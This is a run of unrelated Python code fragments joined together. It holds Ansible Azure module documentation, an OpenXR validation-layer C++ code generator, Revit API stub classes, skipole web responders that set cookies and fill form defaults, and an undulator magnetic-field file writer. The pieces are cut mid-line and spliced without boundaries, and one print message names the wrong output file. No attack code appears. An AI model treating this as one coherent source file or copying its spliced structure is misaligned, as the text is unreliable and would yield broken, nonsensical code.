azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
state: absent
'''
RETURN = '''
id:
description:
- Resource ID.
returned: always
type: str
sample: null
name:
description:
- Resource name.
returned: always
type: str
sample: null
type:
description:
- Resource type for API Management resource.
returned: always
type: str
sample: null
properties:
description:
- Api entity contract properties.
returned: always
type: dict
sample: null
contains:
description:
description:
- Description of the API. May include HTML formatting tags.
returned: always
type: str
sample: null
authentication_settings:
description:
- Collection of authentication settings included into this API.
returned: always
type: dict
sample: null
contains:
o_auth2:
description:
- OAuth2 Authentication settings
returned: always
type: dict
sample: null
contains:
authorization_server_id:
description:
- OAuth authorization server identifier.
returned: always
type: str
sample: null
scope:
description:
- operations scope.
returned: always
type: str
sample: null
openid:
description:
            - OpenID Connect Authentication Settings
%s\n' % xr_struct.protect_string
struct_check += '\n'
return struct_check
# Write an inline validation check for handle parents
# self the ValidationSourceOutputGenerator object
# instance_info_string string used to identify the variable associated with the instance information struct.
# first_handle_tuple the handle tuple associated with the type of the first handle
# first_handle_mem_param the member/param of the first handle
# first_handle_desc_name the descriptive name of the first handle
# cur_handle_tuple the handle tuple associated with the type of the current handle
# cur_handle_mem_param the member/param of the current handle
# cur_handle_desc_name the descriptive name of the current handle
# vuid_name the VUID identifier to associate this check and member/param name with
# cmd_name_param the parameter containing the associated command name
# indent the number of tab-stops to indent the current inline strings
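    # For reference, the emitted C++ looks roughly like the sketch below (the handle names
    # "session" and "swapchain" are hypothetical; the exact text comes from the strings
    # assembled in this method):
    #
    #     // Verify that the handles share a common ancestry
    #     if (!VerifyXrParent(XR_OBJECT_TYPE_SESSION, MakeHandleGeneric(session),
    #                         XR_OBJECT_TYPE_SWAPCHAIN, MakeHandleGeneric(swapchain), false)) {
    #         std::ostringstream oss_error;
    #         // ... build the error message ...
    #         CoreValidLogMessage(...);
    #         return XR_ERROR_VALIDATION_FAILURE;
    #     }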
def writeInlineParentCheckCall(self, instance_info_string, first_handle_tuple, first_handle_mem_param, first_handle_desc_name,
cur_handle_tuple, cur_handle_mem_param, cur_handle_desc_name, vuid_name,
cmd_name_param, indent):
parent_check_string = ''
parent_id = 'commonparent'
if (first_handle_tuple.name == cur_handle_tuple.parent or
cur_handle_tuple.name == first_handle_tuple.parent):
parent_id = '%s-parent' % cur_handle_mem_param.name
parent_check_string += self.writeIndent(indent)
pointer_deref = ''
if cur_handle_mem_param.pointer_count > 0:
pointer_deref = '*'
compare_flag = 'true'
if first_handle_mem_param.type == cur_handle_mem_param.type:
compare_flag = 'false'
if cur_handle_mem_param.is_optional:
parent_check_string += '// If the second handle is optional, only check for a common parent if\n'
parent_check_string += self.writeIndent(indent)
parent_check_string += '// it is not XR_NULL_HANDLE\n'
parent_check_string += self.writeIndent(indent)
parent_check_string += 'if (!IsIntegerNullHandle(%s) && !VerifyXrParent(%s, MakeHandleGeneric(%s),\n' % (
cur_handle_desc_name,
self.genXrObjectType(first_handle_mem_param.type),
first_handle_desc_name)
parent_check_string += ' %s, MakeHandleGeneric(%s%s), %s)) {\n' % (
self.genXrObjectType(cur_handle_mem_param.type),
pointer_deref,
cur_handle_desc_name,
compare_flag)
else:
parent_check_string += '// Verify that the handles share a common ancestry\n'
parent_check_string += self.writeIndent(indent)
parent_check_string += 'if (!VerifyXrParent(%s, MakeHandleGeneric(%s),\n' % (
self.genXrObjectType(first_handle_mem_param.type), first_handle_desc_name)
parent_check_string += ' %s, MakeHandleGeneric(%s%s), %s)) {\n' % (
self.genXrObjectType(cur_handle_mem_param.type), pointer_deref, cur_handle_desc_name, compare_flag)
indent = indent + 1
parent_check_string += self.writeIndent(indent)
parent_check_string += 'std::ostringstream oss_error;\n'
parent_check_string += self.writeIndent(indent)
parent_check_string += 'oss_error << "%s " << HandleToHexString(%s);\n' % (
first_handle_mem_param.type, first_handle_desc_name)
if first_handle_tuple.name == cur_handle_tuple.parent:
parent_check_string += self.writeIndent(indent)
parent_check_string += 'oss_error << " must be a parent to %s ";\n' % cur_handle_mem_param.type
parent_check_string += self.writeIndent(indent)
parent_check_string += 'oss_error << HandleToHexString(%s);\n' % cur_handle_desc_name
elif cur_handle_tuple.name == first_handle_tuple.parent:
parent_check_string += self.writeIndent(indent)
parent_check_string += 'oss_error << " must be a child of %s ";\n' % cur_handle_mem_param.type
parent_check_string += self.writeIndent(indent)
parent_check_string += 'oss_error << HandleToHexString(%s);\n' % cur_handle_desc_name
else:
parent_check_string += self.writeIndent(indent)
parent_check_string += 'oss_error << " and %s ";\n' % cur_handle_mem_param.type
parent_check_string += self.writeIndent(indent)
parent_check_string += 'oss_error << HandleToHexString(%s);\n' % cur_handle_desc_name
parent_check_string += self.writeIndent(indent)
parent_check_string += 'oss_error << " must share a parent";\n'
parent_check_string += self.writeIndent(indent)
parent_check_string += 'CoreValidLogMessage(%s, "VUID-%s-%s",\n' % (instance_info_string,
vuid_name,
parent_id)
parent_check_string += self.writeIndent(indent)
parent_check_string += ' VALID_USAGE_DEBUG_SEVERITY_ERROR, %s,\n' % cmd_name_param
parent_check_string += self.writeIndent(indent)
parent_check_string += ' objects_info, oss_error.str());\n'
parent_check_string += self.writeIndent(indent)
parent_check_string += 'return XR_ERROR_VALIDATION_FAILURE;\n'
indent = indent - 1
parent_check_string += self.writeIndent(indent)
parent_check_string += '}\n'
return parent_check_string
# Generate C++ code to validate the inputs of the current command.
# self the ValidationSourceOutputGenerator object
# cur_command the command generated in automatic_source_generator.py to validate
def genValidateInputsFunc(self, cur_command):
pre_validate_func = ''
pre_validate_func += 'XrResult %s(' % cur_command.name.replace("xr",
"GenValidUsageInputsXr")
pre_validate_func += '\n'
pre_validate_func += ',\n'.join((param.cdecl.strip() for param in cur_command.params))
pre_validate_func += ') {\n'
wrote_handle_check_proto = False
command_name_string = '"%s"' % cur_command.name
# If the first parameter is a handle and we either have to validate that handle, or check
# for extension information, then we will need the instance information.
indent = 1
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'try {\n'
indent = indent + 1
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'XrResult xr_result = XR_SUCCESS;\n'
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'std::vector<GenValidUsageXrObjectInfo> objects_info;\n'
first_param = cur_command.params[0]
first_param_tuple = self.getHandle(first_param.type)
if first_param_tuple is not None:
first_handle_name = self.getFirstHandleName(first_param)
obj_type = self.genXrObjectType(first_param.type)
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'objects_info.emplace_back(%s, %s);\n\n'% (first_handle_name, obj_type)
# Must verify this param first.
# Can skip validating it later.
pre_validate_func += self.outputParamMemberContents(True, cur_command.name, first_param, '',
'nullptr', # no instance_info yet!
command_name_string,
True,
first_param,
first_param.name,
first_param_tuple,
wrote_handle_check_proto,
indent)
wrote_handle_check_proto = True
if first_param_tuple.name == 'XrInstance':
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'GenValidUsageXrInstanceInfo *gen_instance_info = g_instance_info.get(%s);\n' % first_handle_name
else:
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'auto info_with_instance = %s.getWithInstanceInfo(%s);\n' % (
self.makeInfoName(handle_type_name=first_param.type), first_handle_name)
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'GenValidUsageXrHandleInfo *gen_%s_info = info_with_instance.first;\n' % undecorate(first_param_tuple.name)
pre_validate_func += self.writeIndent(indent)
pre_validate_func += '(void)gen_%s_info; // quiet warnings\n' % undecorate(first_param_tuple.name)
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'GenValidUsageXrInstanceInfo *gen_instance_info = info_with_instance.second;\n'
pre_validate_func += self.writeIndent(indent)
pre_validate_func += '(void)gen_instance_info; // quiet warnings\n'
# If any of the associated handles has validation state tracking, get the
# appropriate struct setup for validation later in the function
valid_type_list = []
if cur_command.checks_state:
for cur_state in self.api_states:
if cur_command.name in cur_state.check_commands:
command_param_of_type = ''
for param in cur_command.params:
if param.type == cur_state.type:
command_param_of_type = param.name
break
if command_param_of_type and cur_state.type not in valid_type_list:
valid_type_list.append(cur_state.type)
pre_validate_func += self.writeIndent(2)
pre_validate_func += 'auto %s_valid = g_%s_valid_states[%s];\n' % (
undecorate(cur_state.type), undecorate(cur_state.type), command_param_of_type)
for additional_ext in cur_command.required_exts:
pre_validate_func += self.writeIndent(indent)
pre_validate_func += '// Check to make sure that the extension this command is in has been enabled\n'
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'if (!ExtensionEnabled(gen_instance_info->enabled_extensions, "%s")) {\n' % additional_ext
pre_validate_func += self.writeIndent(indent + 1)
pre_validate_func += 'return XR_ERROR_VALIDATION_FAILURE;\n'
pre_validate_func += self.writeIndent(indent)
pre_validate_func += '}\n'
instance_info_variable = 'gen_instance_info' if first_param_tuple else 'nullptr'
# Check for non-optional null pointers
for count, param in enumerate(cur_command.params):
is_first = (count == 0)
if is_first and first_param_tuple:
# This is the first param, which we already validated as being a handle above. Skip this here.
continue
if not is_first and param.is_handle and not param.pointer_count > 0:
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'objects_info.emplace_back(%s, %s);\n' % (param.name, self.genXrObjectType(
param.type))
if not param.no_auto_validity:
pre_validate_func += self.outputParamMemberContents(True, cur_command.name, param, '',
instance_info_variable,
command_name_string,
is_first,
first_param,
first_param.name,
first_param_tuple,
wrote_handle_check_proto,
indent)
wrote_handle_check_proto = True
count = count + 1
# If this command needs to be checked to ensure that it is executing between
# a "begin" and an "end" command, do so.
if cur_command.checks_state:
for cur_state in self.api_states:
if cur_command.name in cur_state.check_commands:
for param in cur_command.params:
if param.type == cur_state.type:
break
pre_validate_func += self.writeIndent(2)
pre_validate_func += '// Validate that this command is called at the proper time between the\n'
pre_validate_func += self.writeIndent(2)
pre_validate_func += '// appropriate commands\n'
pre_validate_func += self.writeIndent(2)
pre_validate_func += 'if (!%s_valid->%s) {\n' % (
undecorate(cur_state.type), cur_state.variable)
pre_validate_func += self.writeIndent(3)
pre_validate_func += 'std::string error_msg = "%s is required to be called between successful calls to ";\n' % cur_command.name
pre_validate_func += self.writeIndent(3)
pre_validate_func += 'error_msg += "'
cur_count = 0
for begin_command in cur_state.begin_commands:
if cur_count > 0:
pre_validate_func += '/'
cur_count += 1
pre_validate_func += '%s' % begin_command
pre_validate_func += ' and '
cur_count = 0
for end_command in cur_state.end_commands:
if cur_count > 0:
pre_validate_func += '/'
cur_count += 1
pre_validate_func += '%s' % end_command
pre_validate_func += ' commands";\n'
pre_validate_func += self.writeIndent(3)
pre_validate_func += 'CoreValidLogMessage(%s, "VUID-%s-%s-checkstate",\n' % (
instance_info_variable, cur_command.name, cur_state.state)
pre_validate_func += self.writeIndent(3)
pre_validate_func += ' VALID_USAGE_DEBUG_SEVERITY_ERROR, "%s", objects_info,\n' % cur_command.name
pre_validate_func += self.writeIndent(3)
pre_validate_func += ' error_msg);\n'
pre_validate_func += self.writeIndent(3)
pre_validate_func += 'return XR_ERROR_VALIDATION_FAILURE;\n'
pre_validate_func += self.writeIndent(2)
pre_validate_func += '}\n'
# If this command needs to indicate that a validation state has begun, do so.
if cur_command.begins_state:
for cur_state in self.api_states:
if cur_command.name in cur_state.check_commands:
for param in cur_command.params:
if param.type == cur_state.type:
break
# First, make sure we're not calling two (or more) "begins" in a row
pre_validate_func += self.writeIndent(2)
pre_validate_func += '// Validate that this command is called first or only after the corresponding\n'
pre_validate_func += self.writeIndent(2)
pre_validate_func += '// "completion" commands\n'
pre_validate_func += self.writeIndent(2)
pre_validate_func += 'if (%s_valid->%s) {\n' % (
undecorate(cur_state.type), cur_state.variable)
pre_validate_func += self.writeIndent(3)
pre_validate_func += 'std::string error_msg = "%s is called again without first successfully calling ";\n' % cur_command.name
pre_validate_func += self.writeIndent(3)
pre_validate_func += 'error_msg += "'
cur_count = 0
for end_command in cur_state.end_commands:
if cur_count > 0:
pre_validate_func += '/'
cur_count += 1
pre_validate_func += '%s' % end_command
pre_validate_func += '";\n'
pre_validate_func += self.writeIndent(3)
pre_validate_func += 'CoreValidLogMessage(%s, "VUID-%s-%s-beginstate",\n' % (
instance_info_variable, cur_command.name, cur_state.state)
pre_validate_func += self.writeIndent(3)
pre_validate_func += ' VALID_USAGE_DEBUG_SEVERITY_ERROR, "%s", objects_info,\n' | |
"""Indicates whether the document is to be saved as master file.
Get: IsSavingAsMasterFile(self: DocumentSavedAsEventArgs) -> bool
"""
OriginalPath = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Original path of the document.
Get: OriginalPath(self: DocumentSavedAsEventArgs) -> str
"""
class DocumentSavedEventArgs(RevitAPIPostDocEventArgs, IDisposable):
""" The event arguments used by the DocumentSaved event. """
def Dispose(self):
""" Dispose(self: RevitAPIEventArgs, A_0: bool) """
pass
def ReleaseUnmanagedResources(self, *args): # cannot find CLR method
""" ReleaseUnmanagedResources(self: RevitAPIEventArgs, disposing: bool) """
pass
def __enter__(self, *args): # cannot find CLR method
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args): # cannot find CLR method
""" __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class DocumentSavingAsEventArgs(RevitAPIPreDocEventArgs, IDisposable):
""" The event arguments used by the DocumentSavingAs event. """
def Dispose(self):
""" Dispose(self: RevitAPIEventArgs, A_0: bool) """
pass
def ReleaseUnmanagedResources(self, *args): # cannot find CLR method
""" ReleaseUnmanagedResources(self: RevitAPIEventArgs, disposing: bool) """
pass
def __enter__(self, *args): # cannot find CLR method
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args): # cannot find CLR method
""" __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
IsSavingAsMasterFile = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Indicates whether the document is to be saved as master file.
Get: IsSavingAsMasterFile(self: DocumentSavingAsEventArgs) -> bool
"""
PathName = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Target path to which the document is to be saved.
Get: PathName(self: DocumentSavingAsEventArgs) -> str
"""
class DocumentSavingEventArgs(RevitAPIPreDocEventArgs, IDisposable):
""" The event arguments used by the DocumentSaving event. """
def Dispose(self):
""" Dispose(self: RevitAPIEventArgs, A_0: bool) """
pass
def ReleaseUnmanagedResources(self, *args): # cannot find CLR method
""" ReleaseUnmanagedResources(self: RevitAPIEventArgs, disposing: bool) """
pass
def __enter__(self, *args): # cannot find CLR method
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args): # cannot find CLR method
""" __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class DocumentSynchronizedWithCentralEventArgs(RevitAPIPostDocEventArgs, IDisposable):
""" The event arguments used by the DocumentSynchronizedWithCentralEventArgs event. """
def Dispose(self):
""" Dispose(self: RevitAPIEventArgs, A_0: bool) """
pass
def ReleaseUnmanagedResources(self, *args): # cannot find CLR method
""" ReleaseUnmanagedResources(self: RevitAPIEventArgs, disposing: bool) """
pass
def __enter__(self, *args): # cannot find CLR method
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args): # cannot find CLR method
""" __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class DocumentSynchronizingWithCentralEventArgs(RevitAPIPreDocEventArgs, IDisposable):
""" The event arguments used by the DocumentSynchronizingWithCentralEventArgs event. """
def Dispose(self):
""" Dispose(self: RevitAPIEventArgs, A_0: bool) """
pass
def ReleaseUnmanagedResources(self, *args): # cannot find CLR method
""" ReleaseUnmanagedResources(self: RevitAPIEventArgs, disposing: bool) """
pass
def __enter__(self, *args): # cannot find CLR method
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args): # cannot find CLR method
""" __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
Comments = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""User's comments for synchronization.
Get: Comments(self: DocumentSynchronizingWithCentralEventArgs) -> str
"""
Location = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Full path of the central model which is to be synchronized.
Get: Location(self: DocumentSynchronizingWithCentralEventArgs) -> str
"""
Options = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""User's options associated with the synchronization operation.
Get: Options(self: DocumentSynchronizingWithCentralEventArgs) -> SynchronizeWithCentralOptions
"""
class DocumentWorksharingEnabledEventArgs(RevitAPISingleEventArgs, IDisposable):
""" The event arguments used by the DocumentWorksharingEnabled event. """
def Dispose(self):
""" Dispose(self: RevitAPIEventArgs, A_0: bool) """
pass
def GetDocument(self):
"""
GetDocument(self: DocumentWorksharingEnabledEventArgs) -> Document
Returns document associated with this event
Returns: The document associated with this event.
"""
pass
def ReleaseUnmanagedResources(self, *args): # cannot find CLR method
""" ReleaseUnmanagedResources(self: RevitAPIEventArgs, disposing: bool) """
pass
def __enter__(self, *args): # cannot find CLR method
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args): # cannot find CLR method
""" __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class ElementTypeDuplicatedEventArgs(RevitAPIPostDocEventArgs, IDisposable):
""" The event arguments used by the ElementTypeDuplicated event. """
def Dispose(self):
""" Dispose(self: RevitAPIEventArgs, A_0: bool) """
pass
def ReleaseUnmanagedResources(self, *args): # cannot find CLR method
""" ReleaseUnmanagedResources(self: RevitAPIEventArgs, disposing: bool) """
pass
def __enter__(self, *args): # cannot find CLR method
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args): # cannot find CLR method
""" __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
NewElementTypeId = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""The id of the newly duplicated ElementType.
Get: NewElementTypeId(self: ElementTypeDuplicatedEventArgs) -> ElementId
"""
NewName = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""The name of the newly duplicated ElementType.
Get: NewName(self: ElementTypeDuplicatedEventArgs) -> str
"""
OriginalElementTypeId = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""The id of the element type that is duplicated.
Get: OriginalElementTypeId(self: ElementTypeDuplicatedEventArgs) -> ElementId
"""
class ElementTypeDuplicatingEventArgs(RevitAPIPreDocEventArgs, IDisposable):
""" The event arguments used by the ElementTypeDuplicating event. """
def Dispose(self):
""" Dispose(self: RevitAPIEventArgs, A_0: bool) """
pass
def ReleaseUnmanagedResources(self, *args): # cannot find CLR method
""" ReleaseUnmanagedResources(self: RevitAPIEventArgs, disposing: bool) """
pass
def __enter__(self, *args): # cannot find CLR method
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args): # cannot find CLR method
""" __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
ElementTypeId = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""The id of the ElementType to be duplicated.
Get: ElementTypeId(self: ElementTypeDuplicatingEventArgs) -> ElementId
"""
class EventStatus(Enum, IComparable, IFormattable, IConvertible):
"""
Describes the status of an action which triggered a post event.
enum EventStatus, values: Cancelled (1), Failed (-1), Succeeded (0)
"""
def __eq__(self, *args): # cannot find CLR method
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self, *args): # cannot find CLR method
""" __format__(formattable: IFormattable, format: str) -> str """
pass
def __ge__(self, *args): # cannot find CLR method
pass
def __gt__(self, *args): # cannot find CLR method
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self, *args): # cannot find CLR method
pass
def __lt__(self, *args): # cannot find CLR method
pass
def __ne__(self, *args): # cannot find CLR method
pass
def __reduce_ex__(self, *args): # cannot find CLR method
pass
def __str__(self, *args): # cannot find CLR method
pass
Cancelled = None
Failed = None
    Succeeded = None
# skipole/ski/responders/submitters.py
"""A Respond object instance is placed in a Respond page,
The instance is callable, and the respondpage calls it
to provide the page action"""
import json, collections
from http import cookies
from string import Template
from .. import skiboot, tag
from ..excepts import ValidateError, ServerError, FailPage, ErrorMessage
from . import Respond
class SubmitData(Respond):
"""
    This responder is used in conjunction with previous responders that validate and store form data in call_data.
Given optional submit_list strings, they will be passed to the user provided submit_data function
in the submit_list argument.
If submit_data raises a FailPage then the fail_ident page will be called.
"""
# This indicates a target page ident is required
target_ident_required = True
# This indicates a list of allowed caller idents is required
allowed_callers_required = True
# This indicates an optional submit_list and fail_ident is required
submit_required = True
# Options for the fields argument
field_options = {'fields': False, # If False, no fields are expected
'widgfields':False, # If True, fields are widgfields, if False, can be other constants
'widgfield_values':False, # If True the field values are widgfields
'fields_optional': True, # if fields is True, then False here means fields must be supplied
'field_values':False, # if True, field values are used
'field_keys': False, # if field_values is True, and this field_keys is True, the values supplied are dictionary keys
'empty_values_allowed':True, # If True, '' is a valid value, if False, some data must be provided
'single_field': False} # Multiple fields accepted
def _respond(self, skicall, form_data, caller_page, ident_list, proj_ident, rawformdata):
"""Calls submit_data"""
self._check_allowed_callers(caller_page, ident_list, proj_ident)
try:
self._submit_data(ident_list, skicall)
except FailPage as e:
# raises a PageError exception
self.raise_error_page(proj_ident, [e.errormessage], e.failpage)
# so all ok, get the target page
return self.get_target_page(proj_ident)
class ColourSubstitute(Respond):
"""
This responder only applies where the final page returned is a css page.
It will call your submit_data function which should return a dictionary of strings as keys
and colour strings as values. The keys will be searched for in the target page
with format '${keystring}' and where found the colour value will be placed there.
If submit_data raises a FailPage then the fail page will be called unchanged.
"""
# This indicates a target page ident is required
target_ident_required = True
# This indicates an optional submit_list and fail_ident is required
submit_required = True
# Options for the fields argument
field_options = {'fields': False, # If False, no fields are expected
'widgfields':False, # If True, fields are widgfields, if False, can be other constants
'widgfield_values':False, # If True the field values are widgfields
'fields_optional': False, # if fields is True, then False here means fields must be supplied
'field_values':False, # if True, field values are used
'field_keys': False, # if field_values is True, and this field_keys is True, the values supplied are dictionary keys
'empty_values_allowed':True, # If True, '' is a valid value, if False, some data must be provided
'single_field': False} # Multiple fields accepted
def _respond(self, skicall, form_data, caller_page, ident_list, proj_ident, rawformdata):
"""Calls submit_data"""
try:
colours = self._submit_data(ident_list, skicall)
except FailPage as e:
# return fail page unchanged, without an error
if e.failpage:
page = self.get_page_from_ident(e.failpage, proj_ident)
else:
page = self.get_fail_page(proj_ident)
if page is None:
raise ServerError("Invalid responder fail page")
return page
# so all ok, get the target page
if not colours:
return self.get_target_page(proj_ident)
if not isinstance(colours, dict):
raise ServerError("Invalid response, the ColourSubstitute responder requires submit_data to return a dictionary.")
skicall.page_data['colour_substitution'] = colours
return self.get_target_page(proj_ident)
class SetCookies(Respond):
"""Calls submit_data to get a http.cookies.BaseCookie object or alternatively a list of lists [[key, value, max-age],...]
with max-age as integer seconds. If the list form is used, cookies will be created with a path equal to the project path
and with the httponly and secure flags set"""
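    # A minimal sketch (hypothetical values): returning
    #     [['sessionid', 'abc123', 3600]]
    # from submit_data sets a cookie named 'sessionid' with value 'abc123', a max-age of
    # one hour, the project path, and the secure and httponly flags.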
# This indicates a target page ident is required
target_ident_required = True
# This indicates a list of allowed caller idents is required
allowed_callers_required = True
# This indicates an optional submit_list and fail_ident is required
submit_required = True
# Options for the fields argument
field_options = {'fields': False, # If False, no fields are expected
'widgfields':False, # If True, fields are widgfields, if False, can be other constants
'widgfield_values':False, # If True the field values are widgfields
'fields_optional': False, # if fields is True, then False here means fields must be supplied
'field_values':False, # if True, field values are used
'field_keys': False, # if field_values is True, and this field_keys is True, the values supplied are dictionary keys
'empty_values_allowed':True, # If True, '' is a valid value, if False, some data must be provided
'single_field': False} # Multiple fields accepted
def _respond(self, skicall, form_data, caller_page, ident_list, proj_ident, rawformdata):
"""Sets cookies, submit_data should return an instance of http.cookies.BaseCookie or a list of lists.
This sets the cookie returned into skicall.page_data['set_cookie']"""
self._check_allowed_callers(caller_page, ident_list, proj_ident)
try:
sendcookies = self._submit_data(ident_list, skicall)
except FailPage as e:
# raises a PageError exception
self.raise_error_page(proj_ident, [e.errormessage], e.failpage)
# sets the cookies in the page headers
if sendcookies:
if isinstance(sendcookies, cookies.BaseCookie):
skicall.page_data['set_cookie'] = sendcookies
elif isinstance(sendcookies, list) or isinstance(sendcookies, tuple):
# assume sendcookies is a list of the form [[key, value, max-age],...]
try:
cki = cookies.SimpleCookie()
# set project path
ck_path = skicall.projectpaths()[skicall.project]
# however this path ends with a /, remove the last /
if len(ck_path)>1 and ck_path.endswith('/'):
ck_path = ck_path.rstrip('/')
for ckitem in sendcookies:
ck_key, ck_string, max_age = ckitem
cki[ck_key] = ck_string
cki[ck_key]['max-age'] = int(max_age)
cki[ck_key]['path'] = ck_path
cki[ck_key]['secure'] = True
cki[ck_key]['httponly'] = True
except:
raise ServerError(message = "cookie list not valid, should be [[key, value, max-age],...] with max-age as integer seconds")
skicall.page_data['set_cookie'] = cki
else:
raise ServerError(message = "Returned cookies from submit_data not valid")
return self.get_target_page(proj_ident)
class GetDictionaryDefaults(Respond):
"""
Web browsers do not send empty fields, therefore a submitted dictionary may have items missing. This responder calls
your submit_data function which should return a dictionary with default values. Any missing fields
in the form data are then filled in with these defaults.
    The call to submit_data will have the 'widgfield':widgfield tuple in the submit dictionary.
"""
# This indicates a target page ident is required
target_ident_required = True
# This indicates a list of allowed caller idents is required
allowed_callers_required = True
# The widgfield to test
widgfield_required = True
# This indicates an optional submit_list and fail_ident is required
submit_required = True
# Options for the fields argument
field_options = {'fields': False, # If False, no fields are expected
'widgfields':False, # If True, fields are widgfields, if False, can be other constants
'widgfield_values':False, # If True the field values are widgfields
'fields_optional': True, # if fields is True, then False here means fields must be supplied
'field_values':False, # if True, field values are used
'field_keys': False, # if field_values is True, and this field_keys is True, the values supplied are dictionary keys
'empty_values_allowed':True, # If True, '' is a valid value, if False, some data must be provided
'single_field': False} # Multiple fields accepted
def _respond(self, skicall, form_data, caller_page, ident_list, proj_ident, rawformdata):
"Gets the target page, filling in the form data"
if caller_page is None:
raise ValidateError()
self._check_allowed_callers(caller_page, ident_list, proj_ident)
# previous caller is allowed
skicall.submit_dict['widgfield']=self.widgfield.to_tuple_no_i()
try:
# and send the widgfield to submit_data
defaultdict = self._submit_data( ident_list, skicall)
except FailPage as e:
# raises a PageError exception
self.raise_error_page(proj_ident, [e.errormessage], e.failpage)
if not isinstance(defaultdict, dict):
raise ServerError(message = "Returned value from submit_data not valid")
# if widgfield empty
if (self.widgfield not in form_data) or (not form_data[self.widgfield]):
form_data[self.widgfield] = defaultdict
return self.get_target_page(proj_ident)
formdict = form_data[self.widgfield]
if not isinstance(formdict, dict):
raise ValidateError()
# check if an unexpected item has been submitted
for field, val in formdict.items():
if field not in defaultdict:
raise ValidateError()
# fill in any missing key values
for field, val in defaultdict.items():
if field not in formdict:
formdict[field] = val
# so all ok, get the target page
return self.get_target_page(proj_ident)
class FieldStoreSubmit(Respond):
"""Takes submitted data from the received form with the given field (regardless of widget name - only uses field name to choose | |
npts_per + 1) / float( n * npts_per) * (b2 - b1) + b1
berr = numpy.arange(n * npts_per + 1) * 0.0
bphase = 2.0 * numpy.pi / lambdau * z
btot = bmod * numpy.sin(bphase)
f = open("bfield.dat", 'w')
f.write('# Columns: z(cm), ampl(tesla), phserr, total(tesla)\n')
f.write('# total = ampl * sin ( twopi/period*z + phserr ) \n')
f.write('# period= %g; nper= %d; npts=%d \n' % (lambdau, n, npts_per))
for i in range(z.size):
f.write("%g %g %g %g\n" % (z[i], bmod[i], berr[i], btot[i]))
f.close()
print("File written to disk: bfield.dat")
f = open("bfield2.dat", 'w')
for i in range(z.size):
if i != 0: f.write("\n")
f.write("%g %g %g" % (z[i], bmod[i], bphase[i]))
f.close()
print("File written to disk: bfield.dat")
with open("txt2u.inp", "w") as f:
f.write("bfield2.dat\n")
